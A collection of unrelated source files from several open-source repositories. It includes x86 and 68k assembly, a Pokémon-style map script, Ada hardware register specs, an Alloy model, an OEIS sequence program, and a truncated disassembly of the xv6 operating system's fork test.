libraries/mmlibc/amd64/src/tls.asm

betopp/pathetix

0

13249

;tls.asm ;TLS getter for MuKe's libc on AMD64 ;<NAME> <<EMAIL>> 2021 section .text bits 64 align 16 global _tls ;_tls_t *_tls() _tls: rdgsbase RAX ret

maps/Route204S.asm

AtmaBuster/pokeplat-gen2

6

246191

<filename>maps/Route204S.asm object_const_def ; object_event constants Route204S_MapScripts: db 0 ; scene scripts db 0 ; callbacks TrainerLassSarah: trainer LASS, SARAH, EVENT_BEAT_LASS_SARAH, .SeenText, .BeatenText, 0, .Script .Script: endifjustbattled opentext writetext .AfterText waitbutton closetext end .SeenText: text "Oh, a weak-looking" line "TRAINER…" para "Do you want to" line "have a go?" done .BeatenText: text "Aww… I should have" line "said no." done .AfterText: text "Oh, you're so mean!" para "I just started" line "training #MON!" done TrainerYoungsterTyler: trainer YOUNGSTER, TYLER, EVENT_BEAT_YOUNGSTER_TYLER, .SeenText, .BeatenText, 0, .Script .Script: endifjustbattled opentext writetext .AfterText waitbutton closetext end .SeenText: text "I'll beat you with" line "the MAGIKARP my" cont "dad gave me!" done .BeatenText: text "But they're the" line "#MON I got from" cont "my dad…" done .AfterText: text "Who gave you your" line "first #MON?" para "Your first #MON" line "is the one with" cont "the most fond" cont "memories, I think." done TrainerLassSamantha: trainer LASS, SAMANTHA1, EVENT_BEAT_LASS_SAMANTHA1, .SeenText, .BeatenText, 0, .Script .Script: endifjustbattled opentext writetext .AfterText waitbutton closetext end .SeenText: text "May I please" line "trouble you for a" cont "battle?" done .BeatenText: text "Oh…" line "You're so strong…" done .AfterText: text "Maybe I could have" line "won if my #MON" cont "held a BERRY…" done Route204_JubilifeSignScript: jumptextsign .Text .Text: text "<SIGN|> ROUTE 204" line "<SIGND> JUBILIFE CITY" done Route204_RavagedPathSignScript: jumptext .Text .Text: text "RAVAGED PATH" done Route204_BoulderKidScript: jumptextfaceplayer .Text .Text: text "There are boulders" line "blocking the way" cont "inside the cavern…" para "I think a #MON's" line "hidden move will" cont "be able to smash" cont "those boulders," cont "though." done Route204_ParlyzHealScript: itemball PARLYZ_HEAL Route204_HPUpScript: itemball HP_UP Route204_SeaIncenseScript: itemball SEA_INCENSE Route204S_MapEvents: db 0, 0 ; filler db 1 ; warp events warp_event 6, 21, RAVAGED_PATH, 1 db 0 ; coord events db 2 ; bg events bg_event 10, 28, BGEVENT_READ, Route204_JubilifeSignScript bg_event 7, 22, BGEVENT_READ, Route204_RavagedPathSignScript db 8 ; object events object_event 8, 32, SPRITE_LASS, SPRITEMOVEDATA_TURN_UP_RIGHT, 0, 0, -1, -1, 0, OBJECTTYPE_TRAINER, 3, TrainerLassSarah, -1 object_event 4, 30, SPRITE_YOUNGSTER, SPRITEMOVEDATA_TURN_LEFT_RIGHT, 0, 0, -1, -1, 0, OBJECTTYPE_TRAINER, 1, TrainerYoungsterTyler, -1 object_event 7, 25, SPRITE_LASS, SPRITEMOVEDATA_STANDING_DOWN, 0, 0, -1, -1, 0, OBJECTTYPE_TRAINER, 3, TrainerLassSamantha, -1 object_event 8, 23, SPRITE_YOUNGSTER, SPRITEMOVEDATA_WALK_LEFT_RIGHT, 1, 0, -1, -1, 0, OBJECTTYPE_SCRIPT, 0, Route204_BoulderKidScript, -1 object_event 9, 18, SPRITE_YOUNGSTER, SPRITEMOVEDATA_WALK_LEFT_RIGHT, 1, 0, -1, -1, 0, OBJECTTYPE_SCRIPT, 0, ObjectEvent, -1 object_event 13, 31, SPRITE_POKE_BALL, SPRITEMOVEDATA_STILL, 0, 0, -1, -1, 0, OBJECTTYPE_ITEMBALL, 0, Route204_ParlyzHealScript, EVENT_ROUTE_204_PARLYZ_HEAL object_event 22, 25, SPRITE_POKE_BALL, SPRITEMOVEDATA_STILL, 0, 0, -1, -1, 0, OBJECTTYPE_ITEMBALL, 0, Route204_HPUpScript, EVENT_ROUTE_204_HP_UP object_event 0, 38, SPRITE_POKE_BALL, SPRITEMOVEDATA_STILL, 0, 0, -1, -1, 0, OBJECTTYPE_ITEMBALL, 0, Route204_SeaIncenseScript, EVENT_ROUTE_204_SEA_INCENSE

alloy4fun_models/trashltl/models/19/7wPGJcy4faJmqDuGh.als

Kaixi26/org.alloytools.alloy

0

2331

<reponame>Kaixi26/org.alloytools.alloy open main pred id7wPGJcy4faJmqDuGh_prop20 { always all f : Trash | f in Trash since f in Protected } pred __repair { id7wPGJcy4faJmqDuGh_prop20 } check __repair { id7wPGJcy4faJmqDuGh_prop20 <=> prop20o }

iod/nul/open.asm

olifink/smsqe

0

80259

; Open NUL Channel V2.00 1989 <NAME> section nul xdef nul_open xdef nul_name xdef nul_parm include 'dev8_keys_qlv' include 'dev8_keys_err' include 'dev8_iod_nul_data' include 'dev8_mac_assert' ;+++ ; NUL channel open operations. (Using IOU.DNAM) ;--- nul_open frame equ $4 subq.l #frame,sp ; make room for the parameters move.l a3,a4 ; save pointer to def block move.l sp,a3 ; set pointer to parameters move.w iou.dnam,a2 ; read name jsr (a2) bra.s nulo_exit bra.s nulo_exit bra.s nulo_setup dc.w 3 nul_name dc.w 'NUL' dc.w 1 dc.w 4 nul_parm dc.w 'FZLP' nulo_setup moveq #nlc_end,d1 move.w mem.achp,a2 ; allocate in heap jsr (a2) bne.s nulo_exit ; ... oops move.w (sp),d1 ; parameter move.w d1,nlc_parm(a0) ; save it add.w d1,d1 move.w nul_key(pc,d1.w),nlc_key(a0) ; set key nulo_exit addq.l #frame,sp rts nul_key dc.w nlc.bp,nlc.file,nlc.zero,nlc.line,nlc.paus end

src/gen-model.ads

Letractively/ada-gen

0

5145

----------------------------------------------------------------------- -- gen-model -- Model for Code Generator -- Copyright (C) 2009, 2010, 2011, 2012 <NAME> -- Written by <NAME> (<EMAIL>) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. ----------------------------------------------------------------------- with Ada.Finalization; with Ada.Strings.Unbounded; with Util.Beans.Basic; with Util.Beans.Objects; with Util.Beans.Objects.Maps; with DOM.Core; package Gen.Model is -- Exception raised if a name is already registered in the model. -- This exception is raised if a table, an enum is already defined. Name_Exist : exception; -- ------------------------------ -- Model Definition -- ------------------------------ type Definition is new Ada.Finalization.Limited_Controlled and Util.Beans.Basic.Readonly_Bean with record Row_Index : Natural; Name : Ada.Strings.Unbounded.Unbounded_String; Attrs : Util.Beans.Objects.Maps.Map_Bean; Comment : Util.Beans.Objects.Object; end record; type Definition_Access is access all Definition'Class; -- Prepare the generation of the model. procedure Prepare (O : in out Definition) is null; -- Get the object unique name. function Get_Name (From : in Definition) return String; -- Get the value identified by the name. -- If the name cannot be found, the method should return the Null object. function Get_Value (From : in Definition; Name : in String) return Util.Beans.Objects.Object; -- Get the value identified by the name. -- If the name cannot be found, the method should return the Null object. function Get_Attribute (From : in Definition; Name : in String) return String; -- Get the value identified by the name. -- If the name cannot be found, the method should return the Null object. function Get_Attribute (From : in Definition; Name : in String) return Ada.Strings.Unbounded.Unbounded_String; -- Set the comment associated with the element. procedure Set_Comment (Def : in out Definition; Comment : in String); -- Initialize the definition from the DOM node attributes. procedure Initialize (Def : in out Definition; Name : in Ada.Strings.Unbounded.Unbounded_String; Node : in DOM.Core.Node); end Gen.Model;

arch/ARM/NXP/svd/lpc55s6x/nxp_svd-plu.ads

morbos/Ada_Drivers_Library

2

21111

<gh_stars>1-10 -- Copyright 2016-2019 NXP -- All rights reserved.SPDX-License-Identifier: BSD-3-Clause -- This spec has been automatically generated from LPC55S6x.svd pragma Restrictions (No_Elaboration_Code); pragma Ada_2012; pragma Style_Checks (Off); with HAL; with System; package NXP_SVD.PLU is pragma Preelaborate; --------------- -- Registers -- --------------- ----------------------------- -- LUT cluster's Registers -- ----------------------------- -- Selects the input source to be connected to LUT0 input0. For each LUT, -- the slot associated with the output from LUTn itself is tied low. type LUT_INP_MUX_LUTn_INPx_Field is ( -- The PLU primary inputs 0. PLU_INPUTS0, -- The PLU primary inputs 1. PLU_INPUTS1, -- The PLU primary inputs 2. PLU_INPUTS2, -- The PLU primary inputs 3. PLU_INPUTS3, -- The PLU primary inputs 4. PLU_INPUTS4, -- The PLU primary inputs 5. PLU_INPUTS5, -- The output of LUT0. LUT_OUTPUTS0, -- The output of LUT1. LUT_OUTPUTS1, -- The output of LUT2. LUT_OUTPUTS2, -- The output of LUT3. LUT_OUTPUTS3, -- The output of LUT4. LUT_OUTPUTS4, -- The output of LUT5. LUT_OUTPUTS5, -- The output of LUT6. LUT_OUTPUTS6, -- The output of LUT7. LUT_OUTPUTS7, -- The output of LUT8. LUT_OUTPUTS8, -- The output of LUT9. LUT_OUTPUTS9, -- The output of LUT10. LUT_OUTPUTS10, -- The output of LUT11. LUT_OUTPUTS11, -- The output of LUT12. LUT_OUTPUTS12, -- The output of LUT13. LUT_OUTPUTS13, -- The output of LUT14. LUT_OUTPUTS14, -- The output of LUT15. LUT_OUTPUTS15, -- The output of LUT16. LUT_OUTPUTS16, -- The output of LUT17. LUT_OUTPUTS17, -- The output of LUT18. LUT_OUTPUTS18, -- The output of LUT19. LUT_OUTPUTS19, -- The output of LUT20. LUT_OUTPUTS20, -- The output of LUT21. LUT_OUTPUTS21, -- The output of LUT22. LUT_OUTPUTS22, -- The output of LUT23. LUT_OUTPUTS23, -- The output of LUT24. LUT_OUTPUTS24, -- The output of LUT25. LUT_OUTPUTS25, -- state(0). STATE0, -- state(1). STATE1, -- state(2). STATE2, -- state(3). STATE3) with Size => 6; for LUT_INP_MUX_LUTn_INPx_Field use (PLU_INPUTS0 => 0, PLU_INPUTS1 => 1, PLU_INPUTS2 => 2, PLU_INPUTS3 => 3, PLU_INPUTS4 => 4, PLU_INPUTS5 => 5, LUT_OUTPUTS0 => 6, LUT_OUTPUTS1 => 7, LUT_OUTPUTS2 => 8, LUT_OUTPUTS3 => 9, LUT_OUTPUTS4 => 10, LUT_OUTPUTS5 => 11, LUT_OUTPUTS6 => 12, LUT_OUTPUTS7 => 13, LUT_OUTPUTS8 => 14, LUT_OUTPUTS9 => 15, LUT_OUTPUTS10 => 16, LUT_OUTPUTS11 => 17, LUT_OUTPUTS12 => 18, LUT_OUTPUTS13 => 19, LUT_OUTPUTS14 => 20, LUT_OUTPUTS15 => 21, LUT_OUTPUTS16 => 22, LUT_OUTPUTS17 => 23, LUT_OUTPUTS18 => 24, LUT_OUTPUTS19 => 25, LUT_OUTPUTS20 => 26, LUT_OUTPUTS21 => 27, LUT_OUTPUTS22 => 28, LUT_OUTPUTS23 => 29, LUT_OUTPUTS24 => 30, LUT_OUTPUTS25 => 31, STATE0 => 32, STATE1 => 33, STATE2 => 34, STATE3 => 35); -- LUTn input x MUX type LUT_INP_MUX_LUT_Register is record -- Selects the input source to be connected to LUT0 input0. For each -- LUT, the slot associated with the output from LUTn itself is tied -- low. LUTn_INPx : LUT_INP_MUX_LUTn_INPx_Field := NXP_SVD.PLU.PLU_INPUTS0; -- unspecified Reserved_6_31 : HAL.UInt26 := 16#0#; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for LUT_INP_MUX_LUT_Register use record LUTn_INPx at 0 range 0 .. 5; Reserved_6_31 at 0 range 6 .. 31; end record; -- LUTn input x MUX type LUT_INP_MUX_LUT_Registers is array (0 .. 4) of LUT_INP_MUX_LUT_Register with Volatile; -- no description available type LUT_Cluster is record -- LUTn input x MUX LUT_INP_MUX : aliased LUT_INP_MUX_LUT_Registers; end record with Volatile, Size => 256; for LUT_Cluster use record LUT_INP_MUX at 0 range 0 .. 159; end record; -- no description available type LUT_Clusters is array (0 .. 25) of LUT_Cluster; -- Specifies the Truth Table contents for LUT0 -- Specifies the Truth Table contents for LUT0 type LUT_TRUTH_Registers is array (0 .. 25) of HAL.UInt32 with Volatile; subtype OUTPUTS_OUTPUT_STATE_Field is HAL.UInt8; -- Provides the current state of the 8 designated PLU Outputs. type OUTPUTS_Register is record -- Read-only. Provides the current state of the 8 designated PLU -- Outputs.. OUTPUT_STATE : OUTPUTS_OUTPUT_STATE_Field; -- unspecified Reserved_8_31 : HAL.UInt24; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for OUTPUTS_Register use record OUTPUT_STATE at 0 range 0 .. 7; Reserved_8_31 at 0 range 8 .. 31; end record; subtype WAKEINT_CTRL_MASK_Field is HAL.UInt8; -- control input of the PLU, add filtering for glitch. type WAKEINT_CTRL_FILTER_MODE_Field is ( -- Bypass mode. Bypass, -- Filter 1 clock period. Filter1Clk, -- Filter 2 clock period. Filter2Clk, -- Filter 3 clock period. Filter3Clk) with Size => 2; for WAKEINT_CTRL_FILTER_MODE_Field use (Bypass => 0, Filter1Clk => 1, Filter2Clk => 2, Filter3Clk => 3); -- hclk is divided by 2**filter_clksel. type WAKEINT_CTRL_FILTER_CLKSEL_Field is ( -- Selects the 1 MHz low-power oscillator as the filter clock. Fro1Mhz, -- Selects the 12 Mhz FRO as the filter clock. Fro12Mhz, -- Selects a third filter clock source, if provided. Other_Clock) with Size => 2; for WAKEINT_CTRL_FILTER_CLKSEL_Field use (Fro1Mhz => 0, Fro12Mhz => 1, Other_Clock => 2); -- Wakeup interrupt control for PLU type WAKEINT_CTRL_Register is record -- Interrupt mask (which of the 8 PLU Outputs contribute to interrupt) MASK : WAKEINT_CTRL_MASK_Field := 16#0#; -- control input of the PLU, add filtering for glitch. FILTER_MODE : WAKEINT_CTRL_FILTER_MODE_Field := NXP_SVD.PLU.Bypass; -- hclk is divided by 2**filter_clksel. FILTER_CLKSEL : WAKEINT_CTRL_FILTER_CLKSEL_Field := NXP_SVD.PLU.Fro1Mhz; -- latch the interrupt , then can be cleared with next bit INTR_CLEAR LATCH_ENABLE : Boolean := False; -- Write data bit of one shall clear (set to zero) the corresponding bit -- in the field. Write to clear wakeint_latched INTR_CLEAR : Boolean := False; -- unspecified Reserved_14_31 : HAL.UInt18 := 16#0#; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for WAKEINT_CTRL_Register use record MASK at 0 range 0 .. 7; FILTER_MODE at 0 range 8 .. 9; FILTER_CLKSEL at 0 range 10 .. 11; LATCH_ENABLE at 0 range 12 .. 12; INTR_CLEAR at 0 range 13 .. 13; Reserved_14_31 at 0 range 14 .. 31; end record; -- Selects the source to be connected to PLU Output 0. type OUTPUT_MUX_OUTPUTn_Field is ( -- The PLU output 0. PLU_OUTPUT0, -- The PLU output 1. PLU_OUTPUT1, -- The PLU output 2. PLU_OUTPUT2, -- The PLU output 3. PLU_OUTPUT3, -- The PLU output 4. PLU_OUTPUT4, -- The PLU output 5. PLU_OUTPUT5, -- The PLU output 6. PLU_OUTPUT6, -- The PLU output 7. PLU_OUTPUT7, -- The PLU output 8. PLU_OUTPUT8, -- The PLU output 9. PLU_OUTPUT9, -- The PLU output 10. PLU_OUTPUT10, -- The PLU output 11. PLU_OUTPUT11, -- The PLU output 12. PLU_OUTPUT12, -- The PLU output 13. PLU_OUTPUT13, -- The PLU output 14. PLU_OUTPUT14, -- The PLU output 15. PLU_OUTPUT15, -- The PLU output 16. PLU_OUTPUT16, -- The PLU output 17. PLU_OUTPUT17, -- The PLU output 18. PLU_OUTPUT18, -- The PLU output 19. PLU_OUTPUT19, -- The PLU output 20. PLU_OUTPUT20, -- The PLU output 21. PLU_OUTPUT21, -- The PLU output 22. PLU_OUTPUT22, -- The PLU output 23. PLU_OUTPUT23, -- The PLU output 24. PLU_OUTPUT24, -- The PLU output 25. PLU_OUTPUT25, -- state(0). STATE0, -- state(1). STATE1, -- state(2). STATE2, -- state(3). STATE3) with Size => 5; for OUTPUT_MUX_OUTPUTn_Field use (PLU_OUTPUT0 => 0, PLU_OUTPUT1 => 1, PLU_OUTPUT2 => 2, PLU_OUTPUT3 => 3, PLU_OUTPUT4 => 4, PLU_OUTPUT5 => 5, PLU_OUTPUT6 => 6, PLU_OUTPUT7 => 7, PLU_OUTPUT8 => 8, PLU_OUTPUT9 => 9, PLU_OUTPUT10 => 10, PLU_OUTPUT11 => 11, PLU_OUTPUT12 => 12, PLU_OUTPUT13 => 13, PLU_OUTPUT14 => 14, PLU_OUTPUT15 => 15, PLU_OUTPUT16 => 16, PLU_OUTPUT17 => 17, PLU_OUTPUT18 => 18, PLU_OUTPUT19 => 19, PLU_OUTPUT20 => 20, PLU_OUTPUT21 => 21, PLU_OUTPUT22 => 22, PLU_OUTPUT23 => 23, PLU_OUTPUT24 => 24, PLU_OUTPUT25 => 25, STATE0 => 26, STATE1 => 27, STATE2 => 28, STATE3 => 29); -- Selects the source to be connected to PLU Output 0 type OUTPUT_MUX_Register is record -- Selects the source to be connected to PLU Output 0. OUTPUTn : OUTPUT_MUX_OUTPUTn_Field := NXP_SVD.PLU.PLU_OUTPUT0; -- unspecified Reserved_5_31 : HAL.UInt27 := 16#0#; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for OUTPUT_MUX_Register use record OUTPUTn at 0 range 0 .. 4; Reserved_5_31 at 0 range 5 .. 31; end record; -- Selects the source to be connected to PLU Output 0 type OUTPUT_MUX_Registers is array (0 .. 7) of OUTPUT_MUX_Register with Volatile; ----------------- -- Peripherals -- ----------------- -- LPC80X Programmable Logic Unit (PLU) type PLU_Peripheral is record -- no description available LUT : aliased LUT_Clusters; -- Specifies the Truth Table contents for LUT0 LUT_TRUTH : aliased LUT_TRUTH_Registers; -- Provides the current state of the 8 designated PLU Outputs. OUTPUTS : aliased OUTPUTS_Register; -- Wakeup interrupt control for PLU WAKEINT_CTRL : aliased WAKEINT_CTRL_Register; -- Selects the source to be connected to PLU Output 0 OUTPUT_MUX : aliased OUTPUT_MUX_Registers; end record with Volatile; for PLU_Peripheral use record LUT at 16#0# range 0 .. 6655; LUT_TRUTH at 16#800# range 0 .. 831; OUTPUTS at 16#900# range 0 .. 31; WAKEINT_CTRL at 16#904# range 0 .. 31; OUTPUT_MUX at 16#C00# range 0 .. 255; end record; -- LPC80X Programmable Logic Unit (PLU) PLU_Periph : aliased PLU_Peripheral with Import, Address => System'To_Address (16#4003D000#); end NXP_SVD.PLU;

programs/oeis/172/A172118.asm

neoneye/loda

22

164993

; A172118: n*(n+1)*(5*n^2-n-3)/2. ; 0,1,45,234,730,1755,3591,6580,11124,17685,26785,39006,54990,75439,101115,132840,171496,218025,273429,338770,415170,503811,605935,722844,855900,1006525,1176201,1366470,1578934,1815255,2077155,2366416,2684880,3034449,3417085,3834810,4289706,4783915,5319639,5899140,6524740,7198821,7923825,8702254,9536670,10429695,11384011,12402360,13487544,14642425,15869925,17173026,18554770,20018259,21566655,23203180,24931116,26753805,28674649,30697110,32824710,35061031,37409715,39874464,42459040,45167265,48003021,50970250,54072954,57315195,60701095,64234836,67920660,71762869,75765825,79933950,84271726,88783695,93474459,98348680,103411080,108666441,114119605,119775474,125639010,131715235,138009231,144526140,151271164,158249565,165466665,172927846,180638550,188604279,196830595,205323120,214087536,223129585,232455069,242069850 lpb $0 mov $2,$0 sub $0,1 seq $2,51874 ; 22-gonal numbers: a(n) = n*(10*n-9). add $3,$2 add $1,$3 lpe mov $0,$1

Kernel/xv6-public/forktest.asm

samyvic/OS-Project

0

709

<gh_stars>0 _forktest: file format elf32-i386 Disassembly of section .text: 00000000 <main>: printf(1, "fork test OK\n"); } int main(void) { 0: f3 0f 1e fb endbr32 4: 55 push %ebp 5: 89 e5 mov %esp,%ebp 7: 83 e4 f0 and $0xfffffff0,%esp forktest(); a: e8 41 00 00 00 call 50 <forktest> exit(); f: e8 45 04 00 00 call 459 <exit> 14: 66 90 xchg %ax,%ax 16: 66 90 xchg %ax,%ax 18: 66 90 xchg %ax,%ax 1a: 66 90 xchg %ax,%ax 1c: 66 90 xchg %ax,%ax 1e: 66 90 xchg %ax,%ax 00000020 <printf>: { 20: f3 0f 1e fb endbr32 24: 55 push %ebp 25: 89 e5 mov %esp,%ebp 27: 53 push %ebx 28: 83 ec 10 sub $0x10,%esp 2b: 8b 5d 0c mov 0xc(%ebp),%ebx write(fd, s, strlen(s)); 2e: 53 push %ebx 2f: e8 9c 01 00 00 call 1d0 <strlen> 34: 83 c4 0c add $0xc,%esp 37: 50 push %eax 38: 53 push %ebx 39: ff 75 08 pushl 0x8(%ebp) 3c: e8 38 04 00 00 call 479 <write> } 41: 8b 5d fc mov -0x4(%ebp),%ebx 44: 83 c4 10 add $0x10,%esp 47: c9 leave 48: c3 ret 49: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 00000050 <forktest>: { 50: f3 0f 1e fb endbr32 54: 55 push %ebp 55: 89 e5 mov %esp,%ebp 57: 53 push %ebx for(n=0; n<N; n++){ 58: 31 db xor %ebx,%ebx { 5a: 83 ec 10 sub $0x10,%esp write(fd, s, strlen(s)); 5d: 68 0c 05 00 00 push $0x50c 62: e8 69 01 00 00 call 1d0 <strlen> 67: 83 c4 0c add $0xc,%esp 6a: 50 push %eax 6b: 68 0c 05 00 00 push $0x50c 70: 6a 01 push $0x1 72: e8 02 04 00 00 call 479 <write> 77: 83 c4 10 add $0x10,%esp 7a: eb 15 jmp 91 <forktest+0x41> 7c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if(pid == 0) 80: 74 58 je da <forktest+0x8a> for(n=0; n<N; n++){ 82: 83 c3 01 add $0x1,%ebx 85: 81 fb e8 03 00 00 cmp $0x3e8,%ebx 8b: 0f 84 92 00 00 00 je 123 <forktest+0xd3> pid = fork(); 91: e8 bb 03 00 00 call 451 <fork> if(pid < 0) 96: 85 c0 test %eax,%eax 98: 79 e6 jns 80 <forktest+0x30> for(; n > 0; n--){ 9a: 85 db test %ebx,%ebx 9c: 74 10 je ae <forktest+0x5e> 9e: 66 90 xchg %ax,%ax if(wait() < 0){ a0: e8 bc 03 00 00 call 461 <wait> a5: 85 c0 test %eax,%eax a7: 78 36 js df <forktest+0x8f> for(; n > 0; n--){ a9: 83 eb 01 sub $0x1,%ebx ac: 75 f2 jne a0 <forktest+0x50> if(wait() != -1){ ae: e8 ae 03 00 00 call 461 <wait> b3: 83 f8 ff cmp $0xffffffff,%eax b6: 75 49 jne 101 <forktest+0xb1> write(fd, s, strlen(s)); b8: 83 ec 0c sub $0xc,%esp bb: 68 3e 05 00 00 push $0x53e c0: e8 0b 01 00 00 call 1d0 <strlen> c5: 83 c4 0c add $0xc,%esp c8: 50 push %eax c9: 68 3e 05 00 00 push $0x53e ce: 6a 01 push $0x1 d0: e8 a4 03 00 00 call 479 <write> } d5: 8b 5d fc mov -0x4(%ebp),%ebx d8: c9 leave d9: c3 ret exit(); da: e8 7a 03 00 00 call 459 <exit> write(fd, s, strlen(s)); df: 83 ec 0c sub $0xc,%esp e2: 68 17 05 00 00 push $0x517 e7: e8 e4 00 00 00 call 1d0 <strlen> ec: 83 c4 0c add $0xc,%esp ef: 50 push %eax f0: 68 17 05 00 00 push $0x517 f5: 6a 01 push $0x1 f7: e8 7d 03 00 00 call 479 <write> exit(); fc: e8 58 03 00 00 call 459 <exit> write(fd, s, strlen(s)); 101: 83 ec 0c sub $0xc,%esp 104: 68 2b 05 00 00 push $0x52b 109: e8 c2 00 00 00 call 1d0 <strlen> 10e: 83 c4 0c add $0xc,%esp 111: 50 push %eax 112: 68 2b 05 00 00 push $0x52b 117: 6a 01 push $0x1 119: e8 5b 03 00 00 call 479 <write> exit(); 11e: e8 36 03 00 00 call 459 <exit> write(fd, s, strlen(s)); 123: 83 ec 0c sub $0xc,%esp 126: 68 4c 05 00 00 push $0x54c 12b: e8 a0 00 00 00 call 1d0 <strlen> 130: 83 c4 0c add $0xc,%esp 133: 50 push %eax 134: 68 4c 05 00 00 push $0x54c 139: 6a 01 push $0x1 13b: e8 39 03 00 00 call 479 <write> exit(); 140: e8 14 03 00 00 call 459 <exit> 145: 66 90 xchg %ax,%ax 147: 66 90 xchg %ax,%ax 149: 66 90 xchg %ax,%ax 14b: 66 90 xchg %ax,%ax 14d: 66 90 xchg %ax,%ax 14f: 90 nop 00000150 <strcpy>: uint locked; }; char* strcpy(char *s, const char *t) { 150: f3 0f 1e fb endbr32 154: 55 push %ebp char *os; os = s; while((*s++ = *t++) != 0) 155: 31 c0 xor %eax,%eax { 157: 89 e5 mov %esp,%ebp 159: 53 push %ebx 15a: 8b 4d 08 mov 0x8(%ebp),%ecx 15d: 8b 5d 0c mov 0xc(%ebp),%ebx while((*s++ = *t++) != 0) 160: 0f b6 14 03 movzbl (%ebx,%eax,1),%edx 164: 88 14 01 mov %dl,(%ecx,%eax,1) 167: 83 c0 01 add $0x1,%eax 16a: 84 d2 test %dl,%dl 16c: 75 f2 jne 160 <strcpy+0x10> ; return os; } 16e: 89 c8 mov %ecx,%eax 170: 5b pop %ebx 171: 5d pop %ebp 172: c3 ret 173: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 17a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 00000180 <strcmp>: int strcmp(const char *p, const char *q) { 180: f3 0f 1e fb endbr32 184: 55 push %ebp 185: 89 e5 mov %esp,%ebp 187: 53 push %ebx 188: 8b 4d 08 mov 0x8(%ebp),%ecx 18b: 8b 55 0c mov 0xc(%ebp),%edx while(*p && *p == *q) 18e: 0f b6 01 movzbl (%ecx),%eax 191: 0f b6 1a movzbl (%edx),%ebx 194: 84 c0 test %al,%al 196: 75 19 jne 1b1 <strcmp+0x31> 198: eb 26 jmp 1c0 <strcmp+0x40> 19a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 1a0: 0f b6 41 01 movzbl 0x1(%ecx),%eax p++, q++; 1a4: 83 c1 01 add $0x1,%ecx 1a7: 83 c2 01 add $0x1,%edx while(*p && *p == *q) 1aa: 0f b6 1a movzbl (%edx),%ebx 1ad: 84 c0 test %al,%al 1af: 74 0f je 1c0 <strcmp+0x40> 1b1: 38 d8 cmp %bl,%al 1b3: 74 eb je 1a0 <strcmp+0x20> return (uchar)*p - (uchar)*q; 1b5: 29 d8 sub %ebx,%eax } 1b7: 5b pop %ebx 1b8: 5d pop %ebp 1b9: c3 ret 1ba: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 1c0: 31 c0 xor %eax,%eax return (uchar)*p - (uchar)*q; 1c2: 29 d8 sub %ebx,%eax } 1c4: 5b pop %ebx 1c5: 5d pop %ebp 1c6: c3 ret 1c7: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 1ce: 66 90 xchg %ax,%ax 000001d0 <strlen>: uint strlen(const char *s) { 1d0: f3 0f 1e fb endbr32 1d4: 55 push %ebp 1d5: 89 e5 mov %esp,%ebp 1d7: 8b 55 08 mov 0x8(%ebp),%edx int n; for(n = 0; s[n]; n++) 1da: 80 3a 00 cmpb $0x0,(%edx) 1dd: 74 21 je 200 <strlen+0x30> 1df: 31 c0 xor %eax,%eax 1e1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 1e8: 83 c0 01 add $0x1,%eax 1eb: 80 3c 02 00 cmpb $0x0,(%edx,%eax,1) 1ef: 89 c1 mov %eax,%ecx 1f1: 75 f5 jne 1e8 <strlen+0x18> ; return n; } 1f3: 89 c8 mov %ecx,%eax 1f5: 5d pop %ebp 1f6: c3 ret 1f7: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 1fe: 66 90 xchg %ax,%ax for(n = 0; s[n]; n++) 200: 31 c9 xor %ecx,%ecx } 202: 5d pop %ebp 203: 89 c8 mov %ecx,%eax 205: c3 ret 206: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 20d: 8d 76 00 lea 0x0(%esi),%esi 00000210 <memset>: void* memset(void *dst, int c, uint n) { 210: f3 0f 1e fb endbr32 214: 55 push %ebp 215: 89 e5 mov %esp,%ebp 217: 57 push %edi 218: 8b 55 08 mov 0x8(%ebp),%edx } static inline void stosb(void *addr, int data, int cnt) { asm volatile("cld; rep stosb" : 21b: 8b 4d 10 mov 0x10(%ebp),%ecx 21e: 8b 45 0c mov 0xc(%ebp),%eax 221: 89 d7 mov %edx,%edi 223: fc cld 224: f3 aa rep stos %al,%es:(%edi) stosb(dst, c, n); return dst; } 226: 89 d0 mov %edx,%eax 228: 5f pop %edi 229: 5d pop %ebp 22a: c3 ret 22b: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 22f: 90 nop 00000230 <strchr>: char* strchr(const char *s, char c) { 230: f3 0f 1e fb endbr32 234: 55 push %ebp 235: 89 e5 mov %esp,%ebp 237: 8b 45 08 mov 0x8(%ebp),%eax 23a: 0f b6 4d 0c movzbl 0xc(%ebp),%ecx for(; *s; s++) 23e: 0f b6 10 movzbl (%eax),%edx 241: 84 d2 test %dl,%dl 243: 75 16 jne 25b <strchr+0x2b> 245: eb 21 jmp 268 <strchr+0x38> 247: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 24e: 66 90 xchg %ax,%ax 250: 0f b6 50 01 movzbl 0x1(%eax),%edx 254: 83 c0 01 add $0x1,%eax 257: 84 d2 test %dl,%dl 259: 74 0d je 268 <strchr+0x38> if(*s == c) 25b: 38 d1 cmp %dl,%cl 25d: 75 f1 jne 250 <strchr+0x20> return (char*)s; return 0; } 25f: 5d pop %ebp 260: c3 ret 261: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi return 0; 268: 31 c0 xor %eax,%eax } 26a: 5d pop %ebp 26b: c3 ret 26c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 